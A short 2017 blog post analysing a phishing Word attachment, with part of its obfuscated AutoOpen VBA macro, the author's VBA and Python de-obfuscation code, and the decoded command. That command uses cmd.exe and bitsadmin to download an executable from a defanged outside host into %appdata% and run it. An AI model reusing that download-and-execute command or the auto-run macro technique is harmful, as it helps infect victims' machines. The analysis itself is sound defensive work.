Wednesday, June 7, 2017

De-obfuscating Macro from Phish Email

Saw this word doc in an email

VirusTotal link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained obfuscated macros; a partial example is below

Sub AutoOpen()
eculso = ""
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)


The string eculso clearly contained the malicious command to be run, so I removed the "run" commands from the VBA and created a de-obfuscate function by reversing their VBA code.

Public Function deobfuscate(obfuscated_command)
  ' Replace "." with "%%" and then split on "%", so the numeric tokens
  ' come out separated by empty entries (skipped below)
  pass1 = Join(Split(obfuscated_command, "."), "%%")
  still_obfuscated_command = Split(Trim(pass1), "%")
  resultstr = ""
  For counter = 0 To UBound(still_obfuscated_command)
   If Len(still_obfuscated_command(counter)) > 0 Then
    ' each token is a number; the macro adds 10, then 2, then 2 before Chr()
    rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
    rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
    converted_string = Array(resultstr, rotate_pass3)
    resultstr = Join(converted_string, "")
   End If
  Next counter
  deobfuscate = resultstr
End Function

Private Sub Document_Open()
  ' paste the obfuscated string taken from the macro here
  obfuscated_command = ""
  actual_command = deobfuscate(obfuscated_command)
  InputBox "malcode", "infosec", actual_command
End Sub

Which results in the malicious command being printed to a popup for me to view

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"
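The same reversal as an added stand-alone Python port (not the post's own code), so the string can be decoded outside Word, for example after extracting the macro with olevba; the sample string here is constructed, since the post redacts the real one.

```python
# Added example: Python port of the post's VBA deobfuscate().
# Encoding used by the macro: numeric tokens separated by "." (the VBA's
# "." -> "%%" replacement means "%" acts as a separator too); each number
# has 10, then 2, then 2 added (i.e. +14) and is passed to Chr().
import re

SHIFT = 10 + 2 + 2  # CInt(token) + 10, then (x + 2) + 2 in the VBA


def deobfuscate(obfuscated_command: str) -> str:
    """Reverse the macro's encoding: '.'/'%'-separated numbers -> text."""
    result = []
    # Trim() then Split(): empty tokens between separators are skipped,
    # matching the VBA's Len(...) > 0 check
    for token in re.split(r"[.%]", obfuscated_command.strip()):
        if token:
            result.append(chr(int(token) + SHIFT))
    return "".join(result)


def obfuscate(command: str) -> str:
    """Inverse of deobfuscate(); used only to build a constructed sample."""
    return ".".join(str(ord(c) - SHIFT) for c in command)


# Constructed, benign stand-in for the redacted string from the macro
SAMPLE = obfuscate("cmd.exe /c echo hello")

if __name__ == "__main__":
    print(SAMPLE)
    print(deobfuscate(SAMPLE))
```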


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.
